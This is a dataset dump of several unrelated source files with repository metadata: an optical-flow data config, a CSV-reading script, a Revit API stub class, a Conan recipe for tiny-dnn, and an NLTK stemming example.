'ori_filename_flow', 'ori_shape', 'img_shape', 'img_norm_cfg'
]),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations'),
dict(type='InputResize', exponent=6),
dict(type='Normalize', **img_norm_cfg),
dict(type='TestFormatBundle'),
dict(
type='Collect',
keys=['imgs'],
meta_keys=[
'flow_gt', 'filename1', 'filename2', 'ori_filename1',
'ori_filename2', 'ori_shape', 'img_shape', 'img_norm_cfg',
'scale_factor', 'pad_shape'
])
]
sintel_clean_train = dict(
type=dataset_type,
pipeline=train_pipeline,
data_root=data_root,
test_mode=False,
pass_style='clean')
sintel_final_train = dict(
type=dataset_type,
pipeline=train_pipeline,
data_root=data_root,
test_mode=False,
pass_style='final')
sintel_clean_test = dict(
type=dataset_type,
pipeline=test_pipeline,
data_root=data_root,
test_mode=True,
pass_style='clean')
sintel_final_test = dict(
type=dataset_type,
pipeline=test_pipeline,
data_root=data_root,
test_mode=True,
pass_style='final')
data = dict(
train_dataloader=dict(
samples_per_gpu=1,
workers_per_gpu=5,
drop_last=True,
persistent_workers=True),
val_dataloader=dict(
samples_per_gpu=1,
workers_per_gpu=5,
shuffle=False,
persistent_workers=True),
test_dataloader=dict(samples_per_gpu=1, workers_per_gpu=5, shuffle=False),
train=[sintel_clean_train, sintel_final_train],
val=dict(
type='ConcatDataset',
datasets=[sintel_clean_test, sintel_final_test],
separate_eval=True),
test=dict(
type='ConcatDataset',
datasets=[sintel_clean_test, sintel_final_test],
separate_eval=True))
| 27.956522 | 78 | 0.630793 |
41c00185f3f6bcecc7cdc0c4dfef08229fb18611 | 130 | py | Python | old_versions/old_scripts/csv_to_json_2.py | jschmidtnj/OutlookContacts | baccc43e77ea3e9e0feb56564d4a2aa9413be884 | [
"MIT"
] | 1 | 2021-04-21T16:20:05.000Z | 2021-04-21T16:20:05.000Z | old_versions/old_scripts/csv_to_json_2.py | jschmidtnj/OutlookContacts | baccc43e77ea3e9e0feb56564d4a2aa9413be884 | [
"MIT"
] | null | null | null | old_versions/old_scripts/csv_to_json_2.py | jschmidtnj/OutlookContacts | baccc43e77ea3e9e0feb56564d4a2aa9413be884 | [
"MIT"
] | 1 | 2020-04-02T16:20:44.000Z | 2020-04-02T16:20:44.000Z | import csv
ifile = open('outlook_contacts.CSV', "r", encoding="ascii")
read = csv.reader(ifile)
for row in read :
print (row) | 26 | 60 | 0.684615 |
c3ba9b1cb3ab93fa946e76309a1184e5f1dec73e | 30,761 | py | Python | release/stubs.min/Autodesk/Revit/DB/__init___parts/CompoundStructure.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Autodesk/Revit/DB/__init___parts/CompoundStructure.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Autodesk/Revit/DB/__init___parts/CompoundStructure.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | class CompoundStructure(object, IDisposable):
""" Describes the internal structure of a wall,floor,roof or ceiling. """
def AddWallSweep(self, wallSweepInfo):
"""
AddWallSweep(self: CompoundStructure,wallSweepInfo: WallSweepInfo)
Adds a new wall sweep or reveal to the compound structure.
wallSweepInfo: The wall sweep info to create a wall sweep.
"""
pass
def AssociateRegionWithLayer(self, regionId, layerIdx):
"""
AssociateRegionWithLayer(self: CompoundStructure,regionId: int,layerIdx: int)
Associates a region with a layer.
regionId: The id of a region.
layerIdx: The index of a layer in this CompoundStructure.
"""
pass
def CanLayerBeStructuralMaterial(self, layerIndex):
"""
CanLayerBeStructuralMaterial(self: CompoundStructure,layerIndex: int) -> bool
Identifies if the input layer can be designated as defining the structural
material for this structure.
layerIndex: Index of a layer in the CompoundStructure.
Returns: True if the input layer may be used to define the structural material and false
otherwise.
"""
pass
def CanLayerBeVariable(self, variableLayerIndex):
"""
CanLayerBeVariable(self: CompoundStructure,variableLayerIndex: int) -> bool
Identifies if the input layer can be designated as a variable thickness layer.
variableLayerIndex: Index of a layer in the CompoundStructure.
Returns: True if the input layer may be a variable thickness layer and false otherwise.
"""
pass
def CanLayerWidthBeNonZero(self, layerIdx):
"""
CanLayerWidthBeNonZero(self: CompoundStructure,layerIdx: int) -> bool
Identifies if changing the width of an existing layer from zero to a positive
value will create a rectangular region.
layerIdx: The index of a CompoundStructureLayer.
"""
pass
def ChangeRegionWidth(self, regionId, newWidth):
"""
ChangeRegionWidth(self: CompoundStructure,regionId: int,newWidth: float) -> bool
Adjust the width of an existing simple region.
regionId: The id of a region.
newWidth: The desired width of the specified region.
Returns: True if newWidth is zero and the region was deleted.
"""
pass
def ClearWallSweeps(self, wallSweepType):
"""
ClearWallSweeps(self: CompoundStructure,wallSweepType: WallSweepType)
Removes all sweeps or reveals from the compound structure.
wallSweepType: The type of a wall sweep.
"""
pass
@staticmethod
def CreateSimpleCompoundStructure(layers):
""" CreateSimpleCompoundStructure(layers: IList[CompoundStructureLayer]) -> CompoundStructure """
pass
@staticmethod
def CreateSingleLayerCompoundStructure(*__args):
"""
CreateSingleLayerCompoundStructure(layerFunction: MaterialFunctionAssignment,width: float,materialId: ElementId) -> CompoundStructure
Creates a CompoundStructure containing a single layer.
layerFunction: The function of the single layer.
width: The width of the single layer.
materialId: The ElementId of the material for the single layer.
Returns: The newly created compound structure.
CreateSingleLayerCompoundStructure(sampleHeight: float,layerFunction: MaterialFunctionAssignment,width: float,materialId: ElementId) -> CompoundStructure
Creates a vertically compound CompoundStructure with one layer.
sampleHeight: The sample height of this vertically compound structure.
layerFunction: The function of the single layer.
width: The width of the single layer.
materialId: The ElementId of the material for the single layer.
Returns: The newly created compound structure.
"""
pass
def DeleteLayer(self, layerIdx):
"""
DeleteLayer(self: CompoundStructure,layerIdx: int) -> bool
Deletes the specified layer from this CompoundStructure.
layerIdx: The layer index is zero based. It counts from the exterior of wall and from the
top of roofs,floors and ceilings.
Returns: True if the layer was successfully deleted,and false otherwise.
"""
pass
def Dispose(self):
""" Dispose(self: CompoundStructure) """
pass
def FindEnclosingRegionAndSegments(
self, gridUV, splitDirection, segmentId1, segmentId2
):
"""
FindEnclosingRegionAndSegments(self: CompoundStructure,gridUV: UV,splitDirection: RectangularGridSegmentOrientation) -> (int,int,int)
Given a pair of grid coordinates,and a direction for splitting,returns the
enclosing region and the two segments
intersected by a line through the
grid point.
gridUV: Coordinates of a point in the rectangular grid of this compound structure.
splitDirection: Specifies the direction of the split.
Returns: Returns the id of the enclosing region,and -1 if no region encloses the point.
"""
pass
def GetAdjacentRegions(self, segmentId):
"""
GetAdjacentRegions(self: CompoundStructure,segmentId: int) -> IList[int]
Gets the ids of region bound to a specified segment.
segmentId: The id of a segment in this CompoundStructure.
Returns: The ids of the regions that are bounded by the specified segment.
"""
pass
def GetCoreBoundaryLayerIndex(self, shellLayerType):
"""
GetCoreBoundaryLayerIndex(self: CompoundStructure,shellLayerType: ShellLayerType) -> int
Returns the index of the layer just below the core boundary.
shellLayerType: If ShellLayerType.Exterior return the index on the exterior side (or top side
for a roof,floor,or ceiling type).
If ShellLayerType.Interior return the
index on the interior side (or bottom side for a roof,floor,or ceiling type).
Returns: The index of the layer.
"""
pass
def GetDeckEmbeddingType(self, layerIdx):
"""
GetDeckEmbeddingType(self: CompoundStructure,layerIdx: int) -> StructDeckEmbeddingType
Retrieves the deck embedding type used for the specified structural deck.
layerIdx: Index of a layer in the CompoundStructure.
Returns: The embedding type of the structural deck associated to the specified layer.
Invalid if it is not a structural deck.
"""
pass
def GetDeckProfileId(self, layerIdx):
"""
GetDeckProfileId(self: CompoundStructure,layerIdx: int) -> ElementId
Retrieves the profile loop used for the specified structural deck.
layerIdx: Index of a layer in the CompoundStructure.
Returns: The element id of a FamilySymbol which contains a profile loop used by a
structural deck associated to the specified layer,
or invalidElementId if
isStructuralDeck(layerIdx) is false.
"""
pass
def GetExtendableRegionIds(self, top):
"""
GetExtendableRegionIds(self: CompoundStructure,top: bool) -> IList[int]
Gets the extendable region ids for the compound structure.
top: If true,retrieve ids of regions which are extendable at the top,otherwise
retrieve the ids of regions which are extendable at the bottom.
Returns: An array of region ids which are marked extendable.
"""
pass
def GetFirstCoreLayerIndex(self):
"""
GetFirstCoreLayerIndex(self: CompoundStructure) -> int
Gets the index of the first core layer.
Returns: The index of the first core layer.
"""
pass
def GetLastCoreLayerIndex(self):
"""
GetLastCoreLayerIndex(self: CompoundStructure) -> int
Gets the index of the last core layer.
Returns: The index of the last core layer.
"""
pass
def GetLayerAssociatedToRegion(self, regionId):
"""
GetLayerAssociatedToRegion(self: CompoundStructure,regionId: int) -> int
Gets the layer associated to a particular region.
regionId: The id of a region.
Returns: The index of a layer in this CompoundStructure.
"""
pass
def GetLayerFunction(self, layerIdx):
"""
GetLayerFunction(self: CompoundStructure,layerIdx: int) -> MaterialFunctionAssignment
Retrieves the function of the specified layer.
layerIdx: Index of a layer in the CompoundStructure.
Returns: The function of the layer.
"""
pass
def GetLayers(self):
"""
GetLayers(self: CompoundStructure) -> IList[CompoundStructureLayer]
A copy of the layers which define this compound structure.
Returns: The layers,returned in order (Exterior to Interior for walls,top to bottom
for roofs,floors or ceilings). The index of each layer in this array
can
be used in other CompoundStructure methods accepting a layer index.
"""
pass
def GetLayerWidth(self, layerIdx):
"""
GetLayerWidth(self: CompoundStructure,layerIdx: int) -> float
Retrieves the width of a specified layer.
layerIdx: Index of a layer in the CompoundStructure.
Returns: The width of the specified layer.
"""
pass
def GetMaterialId(self, layerIdx):
"""
GetMaterialId(self: CompoundStructure,layerIdx: int) -> ElementId
Retrieves the material element id of a specified layer.
layerIdx: Index of a layer in the CompoundStructure.
Returns: The material element id.
"""
pass
@staticmethod
def GetMinimumLayerThickness():
"""
GetMinimumLayerThickness() -> float
Get the minimum allowable layer thickness.
Returns: The minimum allowable width of a layer in feet.
"""
pass
def GetNumberOfShellLayers(self, shellLayerType):
"""
GetNumberOfShellLayers(self: CompoundStructure,shellLayerType: ShellLayerType) -> int
Retrieves the number of interior or exterior shell layers.
shellLayerType: If ShellLayerType.Exterior return the number of exterior shell layers (or top
shell layers for a roof,floor,or ceiling type).
If
ShellLayerType.Interior return the number of interior shell layers (or bottom
shell layers for a roof,floor,or ceiling type).
Returns: The number of shell layers in the interior or exterior shell,as specified by
shellLayerType.
"""
pass
def GetOffsetForLocationLine(self, wallLocationLine):
"""
GetOffsetForLocationLine(self: CompoundStructure,wallLocationLine: WallLocationLine) -> float
Returns the offset from the center of the compound structure to the given
location line value.
wallLocationLine: The alignment type of the wall's location line.
Returns: The offset.
"""
pass
def GetPreviousNonZeroLayerIndex(self, thisIdx):
"""
GetPreviousNonZeroLayerIndex(self: CompoundStructure,thisIdx: int) -> int
Returns the index of the nearest non-zero width layer before this layer.
thisIdx: The layer from which to look for a non-zero width layer.
Returns: The index of the layer found.
"""
pass
def GetRegionEnvelope(self, regionId):
"""
GetRegionEnvelope(self: CompoundStructure,regionId: int) -> BoundingBoxUV
Gets the envelope that a specified region spans.
regionId: The id of the region.
Returns: The envelope of the region.
"""
pass
def GetRegionIds(self):
"""
GetRegionIds(self: CompoundStructure) -> IList[int]
Gets the region ids of this compound structure.
Returns: The ids of the regions defining this CompoundStructure.
"""
pass
def GetRegionsAlongLevel(self, height):
"""
GetRegionsAlongLevel(self: CompoundStructure,height: float) -> IList[int]
Returns the ids of the regions encountered as the vertically compound structure
is traversed
at a constant height above the bottom a wall to which this
structure is applied.
height: Distance from the bottom of the wall.
Returns: The ids of the regions intersected by the specified line.
"""
pass
def GetRegionsAssociatedToLayer(self, layerIdx):
"""
GetRegionsAssociatedToLayer(self: CompoundStructure,layerIdx: int) -> IList[int]
Gets the set of region ids associated to a particular layer.
layerIdx: The index of a layer in this CompoundStructure.
Returns: An array of region ids which are associated to the specified layer.
"""
pass
def GetSegmentCoordinate(self, segmentId):
"""
GetSegmentCoordinate(self: CompoundStructure,segmentId: int) -> float
Gets the coordinate of a segment.
segmentId: The id of a segment in this CompoundStructure.
Returns: The local coordinates of the specified segment.
"""
pass
def GetSegmentEndPoints(self, segmentId, regionId, end1, end2):
"""
GetSegmentEndPoints(self: CompoundStructure,segmentId: int,regionId: int) -> (UV,UV)
Gets the end points of a segment.
segmentId: The segment id.
regionId: The region id.
"""
pass
def GetSegmentIds(self):
"""
GetSegmentIds(self: CompoundStructure) -> IList[int]
Gets the segment ids of this compound structure.
Returns: The ids of the segments which form the boundary of the regions of this
CompoundStructure.
"""
pass
def GetSegmentOrientation(self, segmentId):
"""
GetSegmentOrientation(self: CompoundStructure,segmentId: int) -> RectangularGridSegmentOrientation
Gets the orientation of a segment.
segmentId: The id of a segment in this CompoundStructure.
Returns: The orientation of the specified segment.
"""
pass
def GetSimpleCompoundStructure(self, wallHeight, distAboveBase):
"""
GetSimpleCompoundStructure(self: CompoundStructure,wallHeight: float,distAboveBase: float) -> CompoundStructure
Takes a horizontal slice through a sample wall to which this CompoundStructure
is applied
and returns a simple compound structure which describes that
slice,i.e. a series of
parallel layers.
wallHeight: The height of the wall.
distAboveBase: The distance from the base of the wall at which to take the section.
If
distAboveBase < 0,then internally distAboveBase=0 is used.
If
distAboveBase > wallHeight,then internally distAboveBase=wallHeight is used.
Returns: A simple CompoundStructure representing a series of parallel layers.
"""
pass
def GetWallSweepsInfo(self, wallSweepType):
"""
GetWallSweepsInfo(self: CompoundStructure,wallSweepType: WallSweepType) -> IList[WallSweepInfo]
Obtains a list of the intrinsic wall sweeps or reveals in this
CompoundStructure.
wallSweepType: Whether to obtain wall sweeps or reveals.
Returns: An array which describes the intrinsic wall sweeps or reveals.
"""
pass
def GetWidth(self, regionId=None):
"""
GetWidth(self: CompoundStructure,regionId: int) -> float
Computes the width of the envelope (2d bounding box) of the specified region.
regionId: The id of a region in this vertically compound structure.
Returns: The width of the envelope (2d bounding box) of the region.
GetWidth(self: CompoundStructure) -> float
The width implied by this compound structure.
Returns: The width of a host object with this compound structure.
"""
pass
def IsCoreLayer(self, layerIdx):
"""
IsCoreLayer(self: CompoundStructure,layerIdx: int) -> bool
Checks if the specified layer is a core layer.
layerIdx: The index of a layer in this CompoundStructure.
Returns: Returns true if the layer is within the core layer boundary,false if it is in
the interior or exterior shell layers.
"""
pass
def IsEqual(self, otherStructure):
"""
IsEqual(self: CompoundStructure,otherStructure: CompoundStructure) -> bool
Checks whether this CompoundStructure is the same as another CompoundStructure.
otherStructure: A CompoundStructure.
Returns: True if the two CompoundStructures are the same,and false otherwise.
"""
pass
def IsLayerValid(self, layerIdx, layer):
"""
IsLayerValid(self: CompoundStructure,layerIdx: int,layer: CompoundStructureLayer) -> bool
Verifies that the data in this layer is internally consistent.
layerIdx: The index of the layer in the compound structure to be set.
layer: The layer to be set.
Returns: True if the layer is internally consistent,false if the layer is not
internally consistent.
"""
pass
def IsRectangularRegion(self, regionId):
"""
IsRectangularRegion(self: CompoundStructure,regionId: int) -> bool
Determines whether the specified region is rectangular.
regionId: The id of a region.
Returns: True if the specified region is a rectangle,false otherwise.
"""
pass
def IsSimpleRegion(self, regionId):
"""
IsSimpleRegion(self: CompoundStructure,regionId: int) -> bool
Determines whether the region is a simple region in this CompoundStructure.
regionId: The id of a region in this vertically compound structure.
Returns: True if the region is simple,false otherwise.
"""
pass
def IsStructuralDeck(self, layerIdx):
"""
IsStructuralDeck(self: CompoundStructure,layerIdx: int) -> bool
Determines whether a specified layer is a structural deck.
layerIdx: Index of a layer in the CompoundStructure.
Returns: True if specified layer is a structural deck,and false otherwise.
"""
pass
def IsValid(self, doc, errMap, twoLayerErrorsMap):
""" IsValid(self: CompoundStructure,doc: Document) -> (bool,IDictionary[int,CompoundStructureError],IDictionary[int,int]) """
pass
def IsValidRegionId(self, regionId):
"""
IsValidRegionId(self: CompoundStructure,regionId: int) -> bool
Determines whether the specified integer is actually the id of a region in this
CompoundStructure.
regionId: The id of a region in this vertically compound structure.
Returns: True if the region is valid,false otherwise.
"""
pass
def IsValidSampleHeight(self, height):
"""
IsValidSampleHeight(self: CompoundStructure,height: float) -> bool
Is the specified height a valid sample height for this compound structure?
"""
pass
def IsValidSegmentId(self, segmentId):
"""
IsValidSegmentId(self: CompoundStructure,segmentId: int) -> bool
Determines whether the specified integer is actually the id of a segment in
this CompoundStructure.
segmentId: The id of a segment in this CompoundStructure.
Returns: True if the specified segment is valid,false otherwise.
"""
pass
def IsVerticallyHomogeneous(self):
"""
IsVerticallyHomogeneous(self: CompoundStructure) -> bool
Indicates whether this CompoundStructure represents a single set of parallel
layers.
Returns: True if this CompoundStructure represents a series of parallel layers that
stretch from bottom to top,false otherwise.
"""
pass
def MergeRegionsAdjacentToSegment(self, segmentId, layerIdxForMergedRegion):
"""
MergeRegionsAdjacentToSegment(self: CompoundStructure,segmentId: int,layerIdxForMergedRegion: int) -> int
Merges the two regions which share the specified segment.
segmentId: The id of a segment in the underlying grid.
layerIdxForMergedRegion: The index of the layer to which the resulting region will be associated.
Returns: The id of the resulting region. If -1 is returned,then the operation would
have produced
an invalid region and was not performed.
"""
pass
def ParticipatesInWrapping(self, layerIdx):
"""
ParticipatesInWrapping(self: CompoundStructure,layerIdx: int) -> bool
Identifies if a layer is included in wrapping at inserts and ends.
layerIdx: The index of the layer.
Returns: If true,then the layer participates in wrapping at inserts and openings. If
false,the layer will not
participate in wrapping.
"""
pass
def ReleaseUnmanagedResources(self, *args):
""" ReleaseUnmanagedResources(self: CompoundStructure,disposing: bool) """
pass
def RemoveWallSweep(self, wallSweepType, id):
"""
RemoveWallSweep(self: CompoundStructure,wallSweepType: WallSweepType,id: int)
Removes a single sweep or reveal from the compound structure.
wallSweepType: The type of a wall sweep.
id: The id of the sweep or reveal to remove.
"""
pass
def SetDeckEmbeddingType(self, layerIdx, embedType):
"""
SetDeckEmbeddingType(self: CompoundStructure,layerIdx: int,embedType: StructDeckEmbeddingType)
Sets the deck embedding type to use for the specified structural deck.
layerIdx: Index of a layer in the CompoundStructure.
embedType: The embedding type to be used by the specified layer if it is a structural deck.
"""
pass
def SetDeckProfileId(self, layerIdx, profileId):
"""
SetDeckProfileId(self: CompoundStructure,layerIdx: int,profileId: ElementId)
Sets the profile loop to use for the specified structural deck.
layerIdx: Index of a layer in the CompoundStructure.
profileId: The element id of a FamilySymbol which contains a profile loop to be used by
the specified layer if it is a structural deck.
"""
pass
def SetExtendableRegionIds(self, top, regionIds):
""" SetExtendableRegionIds(self: CompoundStructure,top: bool,regionIds: IList[int]) """
pass
def SetLayer(self, layerIdx, layer):
"""
SetLayer(self: CompoundStructure,layerIdx: int,layer: CompoundStructureLayer)
Sets a single layer for this CompoundStructure.
layerIdx: The index of a layer. This should range from 0 to the number of layers - 1.
layer: The layer to be set.
"""
pass
def SetLayerFunction(self, layerIdx, function):
"""
SetLayerFunction(self: CompoundStructure,layerIdx: int,function: MaterialFunctionAssignment)
Sets the function of the specified layer.
layerIdx: Index of a layer in the CompoundStructure.
function: The function of the layer.
"""
pass
def SetLayers(self, layers):
""" SetLayers(self: CompoundStructure,layers: IList[CompoundStructureLayer]) """
pass
def SetLayerWidth(self, layerIdx, width):
"""
SetLayerWidth(self: CompoundStructure,layerIdx: int,width: float)
Sets the width of a specified layer.
layerIdx: Index of a layer in the CompoundStructure.
width: The new width of the specified layer.
"""
pass
def SetMaterialId(self, layerIdx, materialId):
"""
SetMaterialId(self: CompoundStructure,layerIdx: int,materialId: ElementId)
Sets a material element for a specified layer.
layerIdx: Index of a layer in the CompoundStructure.
materialId: The ElementId of a Material element.
"""
pass
def SetNumberOfShellLayers(self, shellLayerType, numLayers):
"""
SetNumberOfShellLayers(self: CompoundStructure,shellLayerType: ShellLayerType,numLayers: int)
Sets the number of interior or exterior shell layers.
shellLayerType: If ShellLayerType.Exterior set the number of exterior shell layers (or top
shell layers for a roof,floor,or ceiling type).
If
ShellLayerType.Interior set the number of interior shell layers (or bottom
shell layers for a roof,floor,or ceiling type).
numLayers: The number of layers to be in the specified shell.
"""
pass
def SetParticipatesInWrapping(self, layerIdx, participatesInWrapping):
"""
SetParticipatesInWrapping(self: CompoundStructure,layerIdx: int,participatesInWrapping: bool)
Assigns if a layer is included in wrapping at inserts and ends.
layerIdx: The index of the layer.
participatesInWrapping: True if the specified layer will participate in wrapping at inserts and ends,
false otherwise.
"""
pass
def SplitRegion(self, gridUV, splitDirection, newSegmentId=None):
"""
SplitRegion(self: CompoundStructure,gridUV: UV,splitDirection: RectangularGridSegmentOrientation) -> (int,int)
Splits the region which contains the specified grid point by a line with the
specified direction.
gridUV: Coordinates of a point in the rectangular grid of this compound structure.
splitDirection: Specifies the direction of the split.
Returns: The id of the region created by this operation.
SplitRegion(self: CompoundStructure,gridUV: UV,splitDirection: RectangularGridSegmentOrientation) -> int
Splits the region which contains the specified grid point by a line with the
specified direction.
gridUV: Coordinates of a point in the rectangular grid of this compound structure.
splitDirection: Specifies the direction of the split.
Returns: The id of the region created by this operation.
"""
pass
def __enter__(self, *args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self, *args):
""" __repr__(self: object) -> str """
pass
CutoffHeight = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Horizontal segments below or at the cutoff height have their distance to the wall bottom fixed,those above
have their distance to the wall top fixed.
Get: CutoffHeight(self: CompoundStructure) -> float
Set: CutoffHeight(self: CompoundStructure)=value
"""
EndCap = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Indicates the end cap condition defining which shell layers will participate in end wrapping.
Get: EndCap(self: CompoundStructure) -> EndCapCondition
Set: EndCap(self: CompoundStructure)=value
"""
HasStructuralDeck = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Checks if the compound structure has a structural deck.
Get: HasStructuralDeck(self: CompoundStructure) -> bool
"""
IsEmpty = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Checks whether this CompoundStructure is empty.
Get: IsEmpty(self: CompoundStructure) -> bool
"""
IsValidObject = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Specifies whether the .NET object represents a valid Revit entity.
Get: IsValidObject(self: CompoundStructure) -> bool
"""
IsVerticallyCompound = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Identifies if this CompoundStructure represents a layout that is more complicated than a simple set of parallel layers.
Get: IsVerticallyCompound(self: CompoundStructure) -> bool
"""
LayerCount = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Returns the number of layers contained in this CompoundStructure.
Get: LayerCount(self: CompoundStructure) -> int
"""
MinimumSampleHeight = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""The minimum sample height determined by the current sample height and the horizontal segments.
Get: MinimumSampleHeight(self: CompoundStructure) -> float
"""
OpeningWrapping = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Indicates the opening wrapping condition defining which shell layers of a wall,in plan view,wrap at inserts and openings.
Get: OpeningWrapping(self: CompoundStructure) -> OpeningWrappingCondition
Set: OpeningWrapping(self: CompoundStructure)=value
"""
SampleHeight = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""The sample height is the presumed height of the wall to which the data in this CompoundStructure is applied.
Get: SampleHeight(self: CompoundStructure) -> float
Set: SampleHeight(self: CompoundStructure)=value
"""
StructuralMaterialIndex = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Indicates the layer whose material defines the structural properties of the type for the purposes of analysis.
Get: StructuralMaterialIndex(self: CompoundStructure) -> int
Set: StructuralMaterialIndex(self: CompoundStructure)=value
"""
VariableLayerIndex = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Indicates the index of the layer which is designated as variable.
Get: VariableLayerIndex(self: CompoundStructure) -> int
Set: VariableLayerIndex(self: CompoundStructure)=value
"""
| 23.698767 | 221 | 0.670102 |
b3a57165d52a3f350379f6992bb2c9476c2eee19 | 4,114 | py | Python | recipes/tiny-dnn/all/conanfile.py | marsven/conan-center-index | d8bb4ad617cee02d8664e8341fa32cdf702e4284 | [
"MIT"
] | 1 | 2021-11-11T03:07:13.000Z | 2021-11-11T03:07:13.000Z | recipes/tiny-dnn/all/conanfile.py | marsven/conan-center-index | d8bb4ad617cee02d8664e8341fa32cdf702e4284 | [
"MIT"
] | 1 | 2022-03-09T06:33:41.000Z | 2022-03-09T06:33:41.000Z | recipes/tiny-dnn/all/conanfile.py | marsven/conan-center-index | d8bb4ad617cee02d8664e8341fa32cdf702e4284 | [
"MIT"
] | null | null | null | from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
import os
required_conan_version = ">=1.43.0"
class TinyDnnConan(ConanFile):
name = "tiny-dnn"
license = "BSD-3-Clause"
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://github.com/tiny-dnn/tiny-dnn"
description = "tiny-dnn is a C++14 implementation of deep learning."
topics = ("header-only", "deep-learning", "embedded", "iot", "computational")
settings = "os", "arch", "compiler", "build_type"
options = {
"with_tbb": [True, False],
}
default_options = {
"with_tbb": False,
}
exports_sources = "CMakeLists.txt"
# TODO: if you move this recipe to CMakeDeps, be aware that tiny-dnn
# relies on CMake variables which are not defined in CMakeDeps, only
# in cmake_find_package. So patch it before.
generators = "cmake", "cmake_find_package"
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _min_cppstd(self):
return "14"
@property
def _min_compilers_version(self):
return {
"gcc": "5",
"clang": "3.4",
"apple-clang": "10",
"Visual Studio": "14"
}
def requirements(self):
self.requires("cereal/1.3.1")
self.requires("stb/cci.20210713")
if self.options.with_tbb:
self.requires("onetbb/2020.3")
def validate(self):
if self.settings.compiler.get_safe("cppstd"):
tools.check_min_cppstd(self, self._min_cppstd)
compiler = str(self.settings.compiler)
version = tools.Version(self.settings.compiler.version)
if compiler in self._min_compilers_version and version < self._min_compilers_version[compiler]:
raise ConanInvalidConfiguration(
"{} requires a compiler that supports at least C++{}".format(
self.name, self._min_cppstd,
)
)
def package_id(self):
self.info.header_only()
def source(self):
tools.get(**self.conan_data["sources"][self.version],
destination=self._source_subfolder, strip_root=True)
def build(self):
tools.replace_in_file(
os.path.join(self._source_subfolder, "tiny_dnn", "util", "image.h"),
"third_party/", "",
)
def package(self):
self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
cmake = CMake(self)
cmake.definitions["USE_TBB"] = self.options.with_tbb
cmake.definitions["USE_GEMMLOWP"] = False
cmake.configure()
cmake.install()
tools.rmdir(os.path.join(self.package_folder, "share"))
def package_info(self):
self.cpp_info.set_property("cmake_file_name", "tinydnn")
self.cpp_info.set_property("cmake_target_name", "TinyDNN::tiny_dnn")
# TODO: back to global scope in conan v2 once cmake_find_package* generators removed
if self.settings.os in ["Linux", "FreeBSD"]:
self.cpp_info.components["tinydnn"].system_libs = ["pthread"]
if self.options.with_tbb:
self.cpp_info.components["tinydnn"].defines = ["CNN_USE_TBB=1"]
# TODO: to remove in conan v2 once cmake_find_package* generators removed
self.cpp_info.filenames["cmake_find_package"] = "tinydnn"
self.cpp_info.filenames["cmake_find_package_multi"] = "tinydnn"
self.cpp_info.names["cmake_find_package"] = "TinyDNN"
self.cpp_info.names["cmake_find_package_multi"] = "TinyDNN"
self.cpp_info.components["tinydnn"].names["cmake_find_package"] = "tiny_dnn"
self.cpp_info.components["tinydnn"].names["cmake_find_package_multi"] = "tiny_dnn"
self.cpp_info.components["tinydnn"].set_property("cmake_target_name", "TinyDNN::tiny_dnn")
self.cpp_info.components["tinydnn"].requires = ["cereal::cereal", "stb::stb"]
if self.options.with_tbb:
self.cpp_info.components["tinydnn"].requires.append("onetbb::onetbb")
| 38.092593 | 103 | 0.637822 |
9807dcd10cee7f9786fb216b617cc5317ba4897a | 553 | py | Python | day5_nltk/stemming.py | AloyASen/Machine-learning-tutorial | 554dbd4007dd5213bb2683be2cc6a01cbc353999 | [
"MIT"
] | null | null | null | day5_nltk/stemming.py | AloyASen/Machine-learning-tutorial | 554dbd4007dd5213bb2683be2cc6a01cbc353999 | [
"MIT"
] | null | null | null | day5_nltk/stemming.py | AloyASen/Machine-learning-tutorial | 554dbd4007dd5213bb2683be2cc6a01cbc353999 | [
"MIT"
] | null | null | null | #finding the word root may help to find its meanings
from nltk.stem import PorterStemmer
from nltk.tokenize import sent_tokenize, word_tokenize
ps = PorterStemmer()
# examples
#case 1 -- only words
example_words = ["python","pythoner","pythoning","pythoned","pythonly"]
for w in example_words:
print(ps.stem(w))
#case 2 -- for sentences
new_text = "It is important to by very pythonly while you are pythoning with python. All pythoners have pythoned poorly at least once."
words = word_tokenize(new_text)
for w in words:
print(ps.stem(w))
| 26.333333 | 135 | 0.750452 |
8c0fe10d137bd8bc25e69309256501485e224bf3 | 804 | py | Python | webapi/standalone_server.py | gonzalorodrigo/SoPaper | 0246c1baeb3a863cb6415ab769f363eb86267bd6 | [
"CC-BY-4.0"
] | 158 | 2015-02-07T13:19:38.000Z | 2022-03-02T15:29:22.000Z | webapi/standalone_server.py | gonzalorodrigo/SoPaper | 0246c1baeb3a863cb6415ab769f363eb86267bd6 | [
"CC-BY-4.0"
] | 8 | 2015-06-15T04:06:30.000Z | 2020-01-25T14:04:02.000Z | webapi/standalone_server.py | gonzalorodrigo/SoPaper | 0246c1baeb3a863cb6415ab769f363eb86267bd6 | [
"CC-BY-4.0"
] | 39 | 2016-01-01T07:14:32.000Z | 2021-04-26T08:25:02.000Z | #!./manage/exec-in-virtualenv.sh
# -*- coding: utf-8 -*-
# $File: standalone_server.py
